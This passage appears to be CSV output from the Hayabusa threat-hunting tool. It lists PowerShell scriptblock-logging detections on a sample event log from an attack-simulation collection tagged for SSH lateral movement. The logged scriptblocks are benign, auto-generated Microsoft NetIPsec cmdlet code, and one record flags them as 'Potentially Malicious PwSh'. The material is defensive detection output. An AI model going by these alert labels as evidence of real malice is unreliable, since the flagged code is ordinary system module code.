-exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [Validate",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"NotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 
$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject'))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"NotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] 
${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
